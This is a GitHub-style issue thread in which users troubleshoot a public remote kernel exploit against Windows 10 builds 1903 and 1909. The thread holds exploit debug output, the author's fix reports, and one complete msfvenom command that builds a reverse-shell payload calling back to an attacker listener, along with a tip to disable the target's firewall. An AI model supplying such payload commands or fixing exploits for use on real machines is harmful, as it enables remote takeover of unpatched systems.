Exploit doesnt work

Question

Exploit doesnt work

0xFF1E071F opened this issue 4 years ago · comments

I am using py3.8
host machine linux
target machine win10 b 1903

they are on the same virtual network

I got this error when i am trying to run exploit.py

[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7a180000000
[+] ntoskrnl entry at fffff8054d392010
[+] found PML4 self-ref entry 1e5
[+] found HalpInterruptController at fffff7a1800015b8
Traceback (most recent call last):
  File "exploit.py", line 475, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 438, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 351, in search_hal_heap
    buff = read_physmem_primitive(ip, port, index + i + 0x38)
  File "exploit.py", line 205, in read_physmem_primitive
    buff = try_read_physmem_primitive(ip, port, phys_addr)
  File "exploit.py", line 220, in try_read_physmem_primitive
    buff = sock.recv(1000)
socket.timeout: timed out

edit:fix right error

Heathens · Answer 1 · Tue Jun 02 2020 20:06:14 GMT+0800 (China Standard Time)

I have this problem,so what should I do

0xFF1E071F · Answer 2 · Tue Jun 02 2020 20:22:25 GMT+0800 (China Standard Time)

I have this problem,so what should I do

Unfortunately i couldn't find a solution yet :/

chompie · Answer 3 · Tue Jun 02 2020 22:51:54 GMT+0800 (China Standard Time)

nvm, it's a bug. i changed the hal heap search and forgot to update that case. will post a fix shortly

chompie · Answer 4 · Wed Jun 03 2020 00:44:03 GMT+0800 (China Standard Time)

fix for this error has been pushed

0xFF1E071F · Answer 5 · Wed Jun 03 2020 16:28:41 GMT+0800 (China Standard Time)

Thank you i have another error now:

python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
  File "exploit.py", line 465, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 428, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 356, in search_hal_heap
    PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes

0xFF1E071F · Answer 6 · Thu Jun 04 2020 15:26:12 GMT+0800 (China Standard Time)

OK ppl, if you are reading this dont forget to

close won 10 b1903/1909 firewall
run msfvenom as:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python and change the USER_PAYLOAD with this shellcode.

This code now works on b1903.

And i cannot make it exploit on 1909 machines.

0xFF1E071F · Answer 7 · Thu Jun 04 2020 21:26:54 GMT+0800 (China Standard Time)

Ok, when i use the exploit on b1909 machines, python code works normally (i mean no error output). But the b1909 machine crashes and reboots.

0xFF1E071F · Answer 8 · Mon Jun 08 2020 15:20:34 GMT+0800 (China Standard Time)

now works on 1909 thanks